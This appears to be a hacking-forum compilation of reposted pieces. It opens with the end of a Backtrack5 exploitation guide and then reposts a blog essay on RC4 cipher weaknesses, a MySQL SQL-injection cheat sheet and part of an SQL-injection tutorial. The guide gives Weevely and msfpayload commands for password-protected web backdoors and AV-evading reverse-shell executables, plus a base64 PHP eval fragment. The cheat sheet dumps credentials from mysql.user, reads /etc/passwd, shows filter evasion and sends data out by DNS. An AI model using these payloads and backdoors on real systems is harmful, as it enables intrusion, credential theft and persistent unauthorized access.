c2VjPic7ZXZhbChiYXNlNjRfZGVjb2RlKHN0cl9yZXBsYWNlKCIgIiwgIisiLCBqb2luK GFycmF5X3NsaWNlKCRhLGNvdW50KCRhKS0zKSkpKSk7ZWNobyAnPC9mb3NlYz4nO30=’)); Usage: To create a backdoor. Weevely.py –g –o filename –p password This will create a backdoor with a specific name and will be password protected. Upload to the target server and access the backdoor using the following command: Usage: weevely.py –t –u http://Remote-IP/backdoor.php -p infosec Webshells: Here is a list of specific web shells which can be used. These are useful in various situations, such as if the web application has a vulnerability (like file upload) or any others that can help us to upload the backdoors. Depending on the website type (for example, if the website is coded in php), then use the php based backdoors. The following web shells available are simple-backdoor.php php-backdoor.php jsp-reverse.jsp cmdjsp.jsp cmd-asp-5.1.asp cmdasp.aspx perlcmd.cgi cfexec.cfm MsfPayload: Metasploit can be used to create backdoors which can then be used for maintaining access in the target server. This can be done with the help of msfpayload. The steps for creating backdoor in msfpayload are as follows: We need to select the payload which we are going to use to get a Meterpreter shell spawned via a reverse TCP connection. The command would be: msf > msfpayload windows/meterpreter/reverse_tcp This payload needs two parameters: LHOST (attackers IP address), and the LPORT for selecting the port that we are going to use. The “R” is then used to give the output file in RAW data format so that we can encode it later on. Msf > msfpayload windows/meterpreter/reverse_tcp LHOST=127.0.0.1 LPORT=1234 R This will create the payload but it has to be encoded in order to avoid AV detection. This can be done using the msfencode option. In order to do this, we need to pipe (“|”) the output generated by msfpayload to msfencode. Msfpayload windows/meterpreter/reverse_tcp LHOST=127.0.0.1 LPORT=1337 R| msfencode –e x86/shikata_ga_nai –t exe >> infosec.exe -e can be used to specify the type of encoding needed. Here I am using shikata_ga_nai encoding and –t for the type of file extension. Here it’s an exe file. Below is the image of the list of encoders available in MSF. Conclusion: These are but a few methods followed while performing an exploitation of a web application. Once we get the information about our target, try to perform a vulnerability assessment in order to get information about the loopholes which can be used. Once this is done, exploit the vulnerabilities and if necessary, upload a backdoor. As I’ve said before, encode the backdoors in order to avoid detection. Hope this helps you in finding vulnerability, exploiting and how to maintain access in your target. Sursa: Web Analysis, Vulnerability Assessment and Exploitation using Backtrack5 | InfoSec Institute – IT Training and Information Security Resources

[h=3]What's the deal with RC4?[/h][h=2]Thursday, December 15, 2011 [/h] Jacob Appelbaum tweets: Does anyone have a good reading list on practically attacking RC4? I don't propose to give an exact answer to Jacob's question here, but his tweet caught my eye for a reason. You see, just the other week I advised implementers to avoid RC4 -- both because it's easy to misuse, and because it's has some real and theoretical flaws. But that doesn't mean any particular RC4 implementation is broken. Instead, I'd prefer you to view my advice as the crypto equivalent of "don't run with scissors", "don't run near the pool", or "don't run near the pool while carrying scissors". I don't know anyone who's actually lost an eye because they ignored these warnings, but I'll still yell this stuff at my kids. It's common sense. Still, that doesn't answer the burning question: how bad is RC4, really? RC4, the stream cipher for the rest of us First, some background. RC4 was invented in 1987 by Ron Rivest. It spent its first seven years as an RSA trade secret before it was eventually leaked to a public mailing list in 1994. The rest, as they say, is history. You could argue that RC4's popularity was inevitable. For one thing, it was already in widespread commercial use. It was fast in software, something that DES wasn't. More importantly, the scheme itself is dirt simple. You can fit the code for RC4 onto a T-shirt, with plenty of room left over for, well, another T-shirt. And don't forget that, once leaked, the 'alleged' RC4 was free. The scheme consists of two parts: a key scheduling algorithm (KSA), and a pseudo-random generator (PRG). To encrypt a message, you run the key through the key scheduler, which produces a scrambled array called the state vector. You then feed the state vector into the PRG, which continuously permutes it while outputting a series of bytes. You then XOR those 'keystream' bytes with your plaintext. RC4 is probably most famous for its (mis)use in 802.11 WEP. It's still used in WPA-TKIP (unsurprising, since TKIP is just a bandaid patch for WEP). But its use goes way beyond that. For one thing, it's a common ciphersuite for TLS, and as of a year or two ago it was even preferred by browsers like Chrome. Up until recently, Microsoft used it everywhere. Skype uses it to obfuscate (though not to encrypt) its communication protocol. It shows up in malware and a zillion crappy DRM packages. To make a long story short, you'll find RC4 anywhere the hardware was too weak, or the developers too lazy to use a better cipher. The plain stupid There are a few basic things you need to avoid when using any PRG-based stream cipher. These aren't specific to RC4, but for some reason they seem to crop up at a higher rate in RC4 implementations than with other ciphers. The big honking obvious one is that you can't re-use the same RC4 keystream to encrypt two different messages. I hope I don't need to go into the consequences, butthey're bad. Don't do it. You'd think this is so obvious that nobody could get it wrong, but that's exactly what Microsoft famously did back in 2005, encrypting different versions of a Word document with the same key. If you must use the same key for different messages, the solution is to combine the key with an Initialization Vector or 'nonce'. Unfortunately this can be problematic as well. Another big issue is ciphertext malleability. If you flip a bit in an RC4 ciphertext, you'll see the same bit flipped in the decrypted plaintext. This is awesome at parties. More to the point, it can lead to practical padding-oracle type attacks that totally compromise the security of your encryption.* The solution to the latter problem is simply to MAC your ciphertexts. Unfortunately, people don't use RC4 because they know what a MAC is -- they use RC4 because you can download the code from Wikipedia. So, again, I would say that this stuff tends to happen more than it should. Key Scheduling Leaving aside the stupid, the real problem with RC4 is the Key Scheduling Algorithm (KSA), which kind of sucks. Picture a brand new box of playing cards. Starting with the unshuffled deck, work systematically from top to bottom, swapping each card's position with another card in the deck. The position you're swapping to is determined by a few simple computations involving the original card's face value and the cryptographic key. Now do this with a stack of about five ordered decks and you've got the RC4 KSA. While this shuffle is thorough, the basic problem is that it isn't quite thorough enough. This leads to predictable patterns that show up in the first PRG output bytes. For example, Mantin and Shamir noted that the second output byte takes on the value '0' with about twice the probability it should. By itself that may not seem terribly useful, but for one thing: it's enough to practically determine whether an unknown algorithm is RC4, given about 128 keystreams on different (random) keys. From what I can tell, the first person to notice problems with KSA was Andrew Roos, who posted a paper to sci.crypt about a year after the leak. Aside from the fact that it was published on Usenet, Roos's result is notable for two reasons. First, he correctly identified use of concatenated IVs as a likely source of weakness in WEP implementations -- years before the FMS attack. Second, he gave recommendations that -- had they been followed -- would have prevented the whole thing. (Life lesson: don't publish important results in newsgroups.) FMS Roos's paper set the table for the most famous attack on RC4, and the one that people still associate with RC4, even though it's been improved upon substantially. This is, of course, the Fluhrer, Mantin and Shamir, or 'FMS' attack, which appeared in 2001. Just like Roos, FMS looked at the KSA and found it wanting -- specifically, they discovered that for certain weak keys, the first byte output by the PRG tends to be correlated to bytes of the key. These weak keys can be obtained by prependinga few chosen bytes (say, 3 of them) to an unknown, fixed, secret key. Given keystreams resulting from 60 such chosen keys, you can derive one byte of the secret portion of the key. A 16-byte key can therefore be computed from about 960 such keystreams. On the face of it this sounds pretty unlikely -- after all, how are you going to get an encryptor to prepend chosen bytes to their secret key. Fortunately the attack works fine even if the adversary just knows that the appropriate bytes were used. This works perfectly for implementations that prepend (or append) a known Initialization Vector to the WEP key. Simply by observing a few million IVs, an attacker can eventually collect enough keystreams to meet the FMS requirements. All of this would have be a historical footnote if it hadn't been for protocols like WEP, which (among its many problems) used a three-byte prepended IV. FMS was quickly demonstrated to work on WEP, then packaged into a neat tool and distributed. Klein, Dropping and Hashing There are two competing approaches to dealing with the FMS attack: Drop the first N bytes of the RC4 keystream, for values of N ranging from 256 to 3,072. Don't concatenate the IV to the key, hash the two together instead. The first option is sometimes referred to as RC4-drop[N], and the actual value of N has been subject to some debate. In 2006, Klein presented a super-charged variant of the FMS attack that reduced the number of needed IVs from millions down to about 25,000. More importantly, he showed that FMS-type attacks are still (borderline) viable even if you drop the first 256 bytes of the keystream. So 768 seems like a bare minimum to me, and some people will argue for much larger values. The second approach was adopted for WPA-TKIP, which was proposed as a band-aid replacement for WEP. TKIP was designed to support legacy WEP-capable devices that had internal RC4 hardware, but weren't powerful enough to handle AES. It made a bunch of positive changes to WEP (including adding a larger IV to prevent keystream reuse), but the most notable change was a new custom hash function that creates a per-packet key from an IV and secret key. As a hash function, the TKIP hash kind of stinks. For one thing, it can be inverted given only about 10 per-packet keys and about 2^32 computation (these days, a few minutes on a TI calculator). However, this isn't as big of a deal as it sounds: pre-image resistance isn't precisely a goal of the TKIP hash, since those per-packet keys themselves should themselves be hard to obtain. Nonetheless, I wouldn't recommend that you mess around with it. If you must use RC4, try a proper hash function. Or better yet, don't use RC4 at all. Distinguishers RC4 is just a PRG, and a PRG is secure if its output is indistinguishable from a stream of truly random bits -- to a 'reasonable' adversary who doesn't know the key.** Hence a great deal of RC4 research focuses on the quality of the cipher's PRG. So is RC4 a good pseudo-random generator? Meh. Given a mere 1.5GB of keystream data, Fluhrer and McGrew presented an algorithm that distinguishes RC4 from random. I already mentioned Mantin and Shamir who cranked this down to about 256 bytes (over various unknown, unrelated keys) by looking at the second output byte. Finally, Mantin noticed the presence of repeating patterns in RC4, which aren't simply dependent on the first few bytes of output, and can be used to distinguish RC4 given about 64MB of keystream. There are, of course, other distinguishing attacks. But does it matter? Well, sort of. Indistinguishability is an important characteristic of a pseudo-random generator. If we have it, then the security argument for RC4 as a stream cipher is very simple: to an adversary who can't distinguish the PRG, RC4 encryption is indistinguishable from a one-time pad. Unfortunately the converse isn't true. Just because RC4 output is distinguishable from random doesn't mean that there's a practical attack on the cipher. These results are important mostly because they illustrate the fundamental wonkiness of RC4, wonkiness that doesn't go away just because you drop the first 3,072 bytes. But they don't exactly give us a practical opening into the cipher itself. Yet. Ok, none of this was very helpful. I just want to know: can I use RC4? Great question. Look, the upshot is that RC4, if used as recommended (with hashed IVs and/or dropped output and MACs), is perfectly sufficient for securely encrypting messages. Today. The problem is, we never know what the future will bring. My advice? Don't run with scissors. You can lose an eye that way. Notes: * You might argue that RC4 implementations shouldn't use padding in the first place, since (unlike CBC mode encryption with a block cipher) messages don't need to be padded to a multiple of a block size. This is true -- however, I would note that 'padding oracle'-style attacks needn't rely specifically on padding. Padding is just one type of encoding that can leak useful information if used incorrectly. See Jager and Somorovsky's recent result on XML encryption for a great example of this. ** By reasonable, of course, we mean 'computationally limited'. This rules out attacks that require an unrealistically long time, quantum computing, or ESP. Posted by Matthew Green at 8:11 AM Sursa: A Few Thoughts on Cryptographic Engineering: What's the deal with RC4?

[h=5]Usefull Stuff For SQLI[/h] A handful of useful functions, syntaxes and queries for MySQL. Also knows as a MySQL Cheat Sheet. [h=4]chernabog[/h] Version: SELECT VERSION() SELECT @@version SELECT @@version_comment SELECT @@version_compile_machine SELECT @@version_compile_os Directories: SELECT @@basedir SELECT @@tmpdir SELECT @@datadir Users: SELECT USER() SELECT SYSTEM_USER() SELECT SESSION_USER() SELECT CURRENT_USER() Current Database: SELECT DATABASE() Concatenation: SELECT CONCAT('foo','.','bar'); #Returns: foo.bar SELECT CONCAT_WS(' ','Hello','MySQL','and','hello','world!'); #Returns: Hello MySQL and hello world! Multi-Concat: #Stacks the row "foo" from the table "bar" together, using the separator "<br />". #Note: This operation can by default only grab 1024 bytes, and do not allow LIMIT. #The 1024 byte limit is stored in the @@group_concat_max_len variable. SELECT GROUP_CONCAT(foo SEPARATOR '<br />') FROM bar Better-Concat: #CONCAT() and CONCAT_WS() do not have the same restriction(s) as GROUP_CONCAT(). #Which therefor allows you to concat strings together up to the @@max_allowed_packet size, #instead of @@group_concat_max_len. The default value for @@max_allowed_packet is currently set to #1048576 bytes, instead of @@group_concat_max_len's 1024. SELECT (CONCAT_WS(0x3A,(SELECT CONCAT_WS(0x2E,table_schema,table_name,column_name) FROM information_schema.columns LIMIT 0,1),(SELECT CONCAT_WS(0x2E,table_schema,table_name,column_name) FROM information_schema.columns LIMIT 1,1),(SELECT CONCAT_WS(0x2E,table_schema,table_name,column_name) FROM information_schema.columns LIMIT 2,1),(SELECT CONCAT_WS(0x2E,table_schema,table_name,column_name) FROM information_schema.columns LIMIT 3,1),(SELECT CONCAT_WS(0x2E,table_schema,table_name,column_name) FROM information_schema.columns LIMIT 4,1))) Change Collation: SELECT CONVERT('test' USING latin1); #Converts "test" to latin1 from any other collation. SELECT CONVERT('rawr' USING utf8); #Converts "rawr" to utf8. Wildcards in SELECT(s): SELECT foo FROM bar WHERE id LIKE 'test%'; #Returns all COLUMN(s) starting with "test". SELECT foo FROM bar WHERE id LIKE '%test'; #Returns all COLUMN(s) ending with "test". Regular Expression in SELECT(s): #Returns all columns matching the regular expression. SELECT foo FROM bar WHERE id RLIKE '(moo|rawr).*' SELECT Without Dublicates: SELECT DISTINCT foo FROM bar Counting Columns: SELECT COUNT(foo) FROM bar; #Returns the amount of rows "foo" from the table "bar". Get Amount of MySQL Users: SELECT COUNT(user) FROM mysql.user Get MySQL Users: SELECT user FROM mysql.user Get MySQL User Privileges: SELECT grantee,privilege_type,is_grantable FROM information_schema.user_privileges Get MySQL User Privileges on Different Databases: SELECT grantee,table_schema,privilege_type FROM information_schema.schema_privileges Get MySQL User Privileges on Different Columns: SELECT table_schema,table_name,column_name,privilege_type FROM information_schema.column_privileges Get MySQL User Credentials & Privileges: SELECT CONCAT_WS(0x2E,host,user,password,Select_priv,Insert_priv,Update_priv,Delete_priv, Create_priv,Drop_priv,Reload_priv,Shutdown_priv,Process_priv, File_priv,Grant_priv,References_priv,Index_priv,Alter_priv,Show_db_priv, Super_priv,Create_tmp_table_priv,Lock_tables_priv,Execute_priv,Repl_slave_priv, Repl_client_priv) FROM mysql.user Get MySQL DBA Accounts: SELECT grantee,privilege_type,is_grantable FROM information_schema.user_privileges WHERE privilege_type='SUPER' SELECT host,user FROM mysql.user WHERE Super_priv='Y' Get Databases: SELECT schema_name FROM information_schema.schemata SELECT DISTINCT db FROM mysql.db SELECT DISTINCT table_schema FROM information_schema.columns SELECT DISTINCT table_schema FROM information_schema.tables Get Databases & Tables: SELECT table_schema,table_name FROM information_schema.tables SELECT DISTINCT table_schema,table_name FROM information_schema.columns Get Databases, Tables & Columns: SELECT table_schema,table_name,column_name FROM information_schema.columns SELECT A Certain Row: SELECT foo FROM bar LIMIT 0,1; #Returns row 0. SELECT foo FROM bar LIMIT 1,1; #Returns row 1. ... SELECT foo FROM bar LIMIT N,1; #Returns row N. Benchmark (Heavy Query): #Performs an MD5 calculation of "1" for 10000 times. SELECT BENCHMARK(10000,MD5(1)) Sleep: #Works only in MySQL 5 and above. #Sleeps for 5 seconds, returns 0 on success. SELECT SLEEP(5) Conversion (Casting): SELECT CAST('1' AS UNSIGNED INTEGER); #Returns: 1 SELECT CAST('65' AS CHAR); #Returns: A Substring: SELECT SUBSTR('foobar',1,3); #Returns: foo Hexadecimal Evasion: SELECT 0x41424344; #Returns: ABCD SELECT 0x2E; #Returns: . SELECT 0x3A; #Returns: : ASCII to Number: SELECT ASCII('A'); #Returns: 65 Number to ASCII: SELECT CHAR(65); #Returns: A SELECT CHAR(89); #Returns: Y SELECT CHAR(116,101,115,116); #Returns: test If Statement: #Returns 1 if the database is running MySQL 5. SELECT IF(ASCII(SUBSTR(VERSION(),1,1))=53,1,0); #Returns 1 if the database is running MySQL 4. SELECT IF(ASCII(SUBSTR(VERSION(),1,1))=52,1,0); Case Statement: #Returns 1 if the database is running MySQL 5. SELECT CASE WHEN (ASCII(SUBSTR(VERSION(),1,1))=53) THEN 1 ELSE 0 END #Returns 1 if the database is running MySQL 4. SELECT CASE WHEN (ASCII(SUBSTR(VERSION(),1,1))=52) THEN 1 ELSE 0 END Read File(s): #Requires you to have the File_priv in mysql.user. On error this statement will return NULL. SELECT LOAD_FILE('/etc/passwd') Write File(s): #You must use quotes on the filename! SELECT 'Hello World' INTO DUMPFILE '/tmp/test.txt' SELECT IF((SELECT NULL INTO DUMPFILE '/tmp/test.txt')=NULL,NULL,'Hello World') Logical Operator(s): AND, &&; #The AND operator have && as an alternative syntax. OR, ||; #The OR operator have || as an alternative syntax. NOT, !; #The NOT operator have ! as an alternative syntax. XOR; #The XOR operator got no alternative syntax. Fuzzy Code Comment: #Code within /*! are getting executed by MySQL. Additional /*! can be used instead of space as evasion. SELECT/*!CONCAT_WS(0x3A,user,host,password)/*!FROM/*!mysql.user*/ Comments: SELECT foo, bar FROM foo.bar-- Single line comment SELECT foo, bar FROM foo.bar/* Multi line comment */ SELECT foo, bar FROM foo.bar# Single line comment SELECT foo, bar FROM foo.bar;%00 Batched query with additional NULL-byte. It do not work together with PHP though. A few evasions/methods to use between your MySQL statements: CR (%0D); #Carrier Return. LF (%0A); #Line Feed. Tab (%09); #The Tab-key. Space (%20); #Most commonly used. You know what a space is. Multiline Comment (/**/); #Well, as the name says. Fuzzy Comment (/*!); #Be sure to end your query with (*/) Parenthesis, ( and ); #Can also be used as separators when used right. Parenthesis instead of space: #As said two lines above, the use of parenthesis can be used as a separator. SELECT * FROM foo.bar WHERE id=(-1)UNION(SELECT(1),(2)) Auto-Casting to Right Collation: SELECT UNHEX(HEX(USER())); #UNHEX() Converts the hexadecimal value(s) to the current collation. DNS Requests (OOB (Out-Of-Band)): #For more information check this. SELECT YourQuery INTO OUTFILE ‘\\\\www.your.host.com\\?file_to_save_as.txt’ Command Execution: #If you're on a MySQL 4.X server, it's possible to execute OS commands as long as you're DBA. #It can be done if you're able to upload a shared object into /usr/lib. #The file extension is .so, and it must contain an "User Defined Function", UDF. #Get raptor_udf.c, it's the source-code for just that feature. #Remember to compile it for the right CPU Architecture. #The CPU architecture can be resolved by this query: SELECT @@version_machine; <blockquote>A couple of useful blind queries to fingerprint the database. All of these return either True or False, as in, you either get a result or you don't.</blockquote> Version: SELECT * FROM foo.bar WHERE id=1 AND ASCII(SUBSTR(VERSION(),1,1))=53; #MySQL 5 SELECT * FROM foo.bar WHERE id=1 AND ASCII(SUBSTR(VERSION(),1,1))=52; #MySQL 4 Running as root: SELECT * FROM foo.bar WHERE id=1 AND IF((SELECT SUBSTR(USER(),1,4))=UNHEX(HEX(0x726F6F74)),1,0)=1 Got File_priv: SELECT * FROM foo.bar WHERE id=1 AND IF((SELECT File_priv FROM mysql.user WHERE (CONCAT_WS(CHAR(64),User,Host) LIKE USER()) OR (CONCAT(User,UNHEX(HEX(0x4025))) LIKE USER()) OR (CONCAT_WS(CHAR(64),User,Host) LIKE CONCAT(SUBSTR(USER(),1,INSTR(USER(),CHAR(64))),CHAR(37))) LIMIT 0,1)=CHAR(89),1,0)=1 Got Super_priv (Are we DBA): SELECT * FROM foo.bar WHERE id=1 AND IF((SELECT Super_priv FROM mysql.user WHERE (CONCAT_WS(CHAR(64),User,Host) LIKE USER()) OR (CONCAT(User,UNHEX(HEX(0x4025))) LIKE USER()) OR (CONCAT_WS(CHAR(64),User,Host) LIKE CONCAT(SUBSTR(USER(),1,INSTR(USER(),CHAR(64))),CHAR(37))) LIMIT 0,1)=CHAR(89),1,0)=1 Can MySQL Sleep: #This query will return True and should take above 1 second to execute. If it's a success. SELECT * FROM foo.bar WHERE id=1 AND IF((SELECT SLEEP(1))=0,1,0)=1 Can MySQL Benchmark: SELECT * FROM foo.bar WHERE id=1 AND IF(BENCHMARK(1,MD5(0))=0,1,0)=1 Are we on *NIX: SELECT * FROM foo.bar WHERE id=1 AND ASCII(SUBSTR(@@datadir,1,1))=47 Are we on Windows: SELECT * FROM foo.bar WHERE id=1 AND IF(ASCII(SUBSTR(@@datadir,2,1))=58,1,0)=1 Do a certain column exist: SELECT * FROM foo.bar WHERE id=1 AND (SELECT COUNT(column_name) FROM information_schema.columns WHERE column_name LIKE 'your_column' LIMIT 0,1)>0 Do a certain table exist: SELECT * FROM foo.bar WHERE id=1 AND (SELECT COUNT(table_name) FROM information_schema.columns WHERE table_name LIKE 'your_table' LIMIT 0,1)>0 SELECT * FROM foo.bar WHERE id=1 AND (SELECT COUNT(table_name) FROM information_schema.tables WHERE table_name LIKE 'your_table' LIMIT 0,1)>0 Do a certain database exist: SELECT * FROM foo.bar WHERE id=1 AND (SELECT COUNT(table_schema) FROM information_schema.columns WHERE table_schema LIKE 'your_database' LIMIT 0,1)>0 SELECT * FROM foo.bar WHERE id=1 AND (SELECT COUNT(table_schema) FROM information_schema.tables WHERE table_schema LIKE 'your_database' LIMIT 0,1)>0 SELECT * FROM foo.bar WHERE id=1 AND (SELECT COUNT(schema_name) FROM information_schema.schemata WHERE schema_name LIKE 'your_database' LIMIT 0,1)>0 SELECT * FROM foo.bar WHERE id=1 AND (SELECT COUNT(db) FROM mysql.db WHERE db LIKE 'your_database' LIMIT 0,1)>0 from:h.ackack(dot)net Sursa: Usefull Stuff For SQLI

Da... Ce sa faca omu la 06:30 AM cand nu are somn? Postez de azi-noapte

SQL Injection (detalied) Tutorial created by ande for www.evilzone.org Written December 27, 2009. Updated May 29, 2011. In this tutorial 1.0 What is SQL? 1.1 Types of SQL or SQL engines 1.2 Understanding the SQL structure 1.3 Finding vulnerabilities 1.4 Exploiting vulnerabilities 1.5 Securing vulnerabilities 1.0 What is SQL? SQL stands for Structured Query Language. It is a way to store, modify and update data secure, fast and reliable. SQL is mostly used for web sites but can however be used for almost any application and or service which is in need of storing, editing and or updating data in a good and structured way. In this tutorial I will be using PHP as script language for examples. PHP is a web script engine. Its the most widely used one, its the best one and its the one you are most likely to encounter in real life scenarios. Now, you might think; But if I only learn this on one type of script, don't I have to learn all of this for all other types of scripts?(ASP, ASP.NET, Java, Perl, CGI, [...]) No, you don't. The concept remains the same. However, to truly understand SQL injection on various script types, I encourage you and recommend you from the bottom of my heart to learn the languages. You don't have to learn them all, but perhaps the top 3 most used or something like that. At least PHP. Additionally I will be using MySQL as the SQL engine in examples. Theoretically SQL can be used by any script engine as it is basically just a application listening on a port on a server waiting for commands/instructions. The only requirement is the ability to use TCP/IP protocol. However some script engines like PHP and ASP(.net) got pre-made classes and functions for some of the most common SQL engines. Making it a whole lot easier to interact with the SQL server. In order to run PHP scripts(at least in a browser) you are going to need a PHP supported web server. It is not required to write a single line of code or install anything on your computer to complete this tutorial. But its a good idea to experiment with all of the elements in this tutorial. PHP, MySQL and web server(I recommend apache). Learn more about PHP: http://php.net | PHP - Wikipedia, the free encyclopedia Learn more about SQL: SQL - Wikipedia, the free encyclopedia Learn more about MySQL: http://mysql.com | MySQL Tutorial - Introduction | MySQL - Wikipedia, the free encyclopedia Learn more about Apache: Apache HTTP Server - Wikipedia, the free encyclopedia PS. If you want a really quick way of installing all of the elements above, install WAMP for Windows. Its a all-in-one Apache, MySQL and PHP system for Windows. Alternatively, here is a guide to setup Apache + PHP, but no MySQL: Starting PHP scripting - Setting up a PHP environment In this case you will have to install MySQL for yourself, which can be a bit hard if you are a beginner. 1.1 Types of SQL or SQL engines There are many different variations of SQL. Most of the coming from different companies, some are free some are not. Some are open source, and some are not. Its like everything else really. Some of the different SQL engines are: Oracle MSSQL MySQL PostgreSQL I personally use MySQL because its free and works well with Apache and whatnot. It also got a good syntax. It is also the most used engine so its what you will most likely encounter when doing injections. All SQL in this tutorial will be MySQL. Learn more about MySQL: http://mysql.com | MySQL Tutorial - Introduction | MySQL - Wikipedia, the free encyclopedia 1.2 Understanding the SQL structure The structure of SQL is divided into; Servers, databases, tables, columns and rows. A SQL server is a software running on a computer waiting for commands from console or over the internet(or localhost/lan). A SQL server consists of databases and can contain as many databases as you want. A database consists of tables. A table consists of columns and rows. Here at Evilzone we use a local SQL server. One of our databases(A SMF forum database) contains these tables: Quote smf_attachments smf_ban_groups smf_ban_items smf_boards smf_board_permissions smf_calendar smf_calendar_holidays smf_categories smf_collapsed_categories smf_log_actions smf_log_activity smf_log_banned smf_log_boards smf_log_errors smf_log_floodcontrol smf_log_karma smf_log_mark_read smf_log_notify smf_log_online smf_log_polls smf_log_search_messages smf_log_search_results smf_log_search_subjects smf_log_search_topics smf_log_topics smf_membergroups smf_members smf_messages smf_message_icons smf_moderators smf_package_servers smf_permissions smf_personal_messages smf_pm_recipients smf_polls smf_poll_choices smf_sessions smf_settings smf_smileys smf_themes smf_topics The table smf_members will most likely contain information about all the members on the forum. A few of the columns smf_members contains: Quote ID_MEMBER memberName dateRegistered posts realName ICQ AIM YIM MSN avatar karma Now a row is one line with all these columns. Ill try to show you with a little ASCII awesomeness here. This entire thing is a table: ______________________________________________________ |____ID_____|___Name_____|____Pass___|______Email_______| |_____0_____|____ande____|___abcgefg__|__abc@gmail.com___| |_____1_____|___satan911_ |___abcgefg__|__abc@gmail.com___| |_____2_____|___abcgefg__ |___abcgefg__|__abc@gmail.com___| |_____3_____|___abceqfg__ |___abcgefg__|__abc@gmail.com___| |_____4_____|___affdeqfg__ |___abcgefg__|__abc@gmail.com___| |_____5_____|___abhhefg__ |___abcgefg__|__abc@gmail.com___| |_____6_____|___abaaefg__ |___abcgefg__|__abc@gmail.com___| |___________|____________|___________|_________________| In this table the fields ID, Name, Pass and Email are columns. The items downwards are rows. Row1: |_____0_____|____ande____|___abcgefg__|__abc@gmail.com___| Row2: |_____1_____|___satan911_ |___abcgefg__|__abc@gmail.com___| Row3: |_____2_____|___abcgefg__ |___abcgefg__|__abc@gmail.com___| And so on... Thats pretty much it really. Takes a few brain fluxuations before you will memorize this on your own. Remember: Server(s)->Databases->Tables->Columns and rows 1.3 Finding vulnerabilities Before moving on now, it is a GOOD idea for you to learn the basics about both PHP and MySQL(at least look up some code), it is not required to be able to perform SQL injections, however. You will find it much easier to perform more advance injections later on(And you will actually understand what the fuck is going on behind the scenes!). I will also do this tutorial by showing the server side code in PHP and MySQL. Okay, our target! http://evilzone.org! Lets now try to find a page where our target(http://evilzone.org) uses SQL with user inputs. So you are browsing around on the page. You find these links: Evilzone - Hacking and Security Community - Index (shows an article) Evilzone - Hacking and Security Community - Index (shows a contact form) http://evilzone.org/contact.php?do=submit (you come to this link when you click send on contact form) Okay, the most common use of SQL is when looking for things like articles, posts, threads, comments, user information, product information and so on. The link index.php?page=contact is probably not SQL based because its not normal to load entire pages from SQL(can be done tho), this link is more likely to be vulnerable to RFI or LFI. But you should still try it nonetheless. The link index.php?do=submit might contain SQL however, then it is most likely a POST SQL injection, which I wont cover in this tutorial. Its very normal to save this kind of information in SQL. Now! The link index.php?id=17! This link almost certainly uses SQL. This is a very common thing to use SQL for. The SQL query for this case would look a lot like this: Code: [select] SELECT * FROM articles WHERE id='17' What this does is, it asks the SQL server for all data(*) where the article's ID = 17. Lets say the article table got a ID, subject and text column. The SQL server will then return the id, subject and text data from the table 'articles' where ID is equal to 17. This is the normal way. This is what it does if a normal user browses the page. However, what if we... Lets try to add a ' to the end of the link so the link becomes http://evilzone.org/index.php?id=17' Now the SQL query would look something like this: Code: [select] SELECT * FROM articles WHERE id='17'' This wont work very well, two 's? The SQL server doesn't understand this so it will now return an error message instead of the data of the article it normally would. So the page will now output something like this(where the article used to be): Quote You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''' at line 1 Error no:xxxx Now, if you are not getting such an error message(any error message is good, doesn't need to be 100% like the one above.), but you are getting a blank page(either in form of a totally white blank page or a page with no content at the places where there used to be content without the error prefix(')). No worries. It can still be vulnerable. In a lot of cases, the page wont return any error messages, but there can still be an error behind the scenes. Which means its still vulnerable. Additionally, the ' character is not always the right one to use or is enough to cause an error. Further testing is required to determine if the target is vulnerable. On top of that. Sometimes, instead of displaying an error message or a blank page, it can do things like redirecting to the main page or something similar. If you are getting an error message you can jump to the next chapter(1.4 Exploiting vulnerabilities). I do however, recommend reading this chapter done tho. Up to you. You should know what to do when no error message appears To determine if a target is vulnerable when it does not output any error message from just adding a ' to the link you need to first try some other characters, if still no error message you need to try a few other techniques. Continue reading. Other error prefixes( like the ' ) are: Quote " \ /* '/* "/* '-- "-- '; "; -- ; If none of the above characters create an error, I highly doubt you will ever get one. Lets move on to some other techniques. If you are getting a blank page(either a totally white one or a page with no content where it used to be content without any error prefix). We need to try to "join" the query instead of creating an error. You can do this in a few different ways. Here are the ones I recommend: Quote +order+by+99999 +or+1=2 +and+1=2 Don't mind the + sign, its the equivalent to a space, but if you put a space in your URL, it will become %20, which is a lot harder to read than +. Now, you use the 3 query injections like this: Using +order+by+xThe whole point here is to see if we can order the result by a something. First, take your URL: index.php?id=17 Then just try adding +order+by+1 If the page now returns normally, try adding +order+by+99999 If the page now does not load normally, you might have vulnerable page. Explanation: +order+by+1 will order the returning results from the MySQL server by column 1. The column 1 must exist because a table cannot have 0 columns. But the +order+by+99999 will try to order the results by column nr 99999. This column cannot possibly exist, because that way over the maximum possible columns in a table. Therefor, this should create an error(or return nothing). Additionally, you should try the exact same procedure as above just with adding /* and '-- after the +order+by+x in combination with adding ' and " before +order+by+x Examples: '+order+by+1 "+order+by+1/* '+order+by+1'-- +order+by+1/* [...] Using +or+x=xThe whole point here is to see if we can trick the SQL server into making a question true no matter what. First, take your URL: index.php?id=17 then change the number(or whatever your URL have as value) into something completely different from its original value. Because this is a number, we will change it into -1. Most likely the SQL server does not got a article with the ID -1 Our URL now looks like this: index.php?id=-1 Then just try adding +or+1=1 If the page now returns normally, try adding +or+1=2 If the page now does not load normally, you might have vulnerable page. Explanation: +or+1=1 will always return true. In this example with the query I showed you above this will make the entire query something like this: Code: [select] SELECT * FROM articles WHERE id='-1' or 1=1 So, the SQL server will return all articles where 1=1! This also means you will most likely not the get same article you got the first time, but rather the first article in the database. Or you will get all articles on the same page. nonetheless, we got ourselfs a vulnerable page! Additionally, you should try the exact same procedure as above just with adding /* and '-- after the +or+1=1 in combination with adding ' and " before +or+1=1. Also try 'a'='a and "a"="a instead of 1=1 (yes without the last ' and ") Examples: '+or+1=1 '+or+'a'='a +or+1=1/* [...] Using +and+x=xThe whole point here is to set another condition in the query to see if we can affect the query at all. First, take your URL: index.php?id=17 Then just try adding +and+1=1 If the page now returns normally, try adding +and+1=2 If the page now does not load normally, you might have vulnerable page. Explanation: +and+1=1 will set another requirement in the query. The query will become like this: Code: [select] SELECT * FROM articles WHERE id='17' and 1=1 But when you put +and+1=2 the query becomes like this: Code: [select] SELECT * FROM articles WHERE id='17' and 1=2 This will of course never be true, because 1 will never be equal to 2. So, if you are able to set your own requirements in the query, we can also do an information retrieval injection, which in the end is what SQL injection is all about. Getting information you are not supposed to. Additionally, you should try the exact same procedure as above just with adding /* and '-- after the +and+x=x in combination with adding ' and " before +and+x=x. 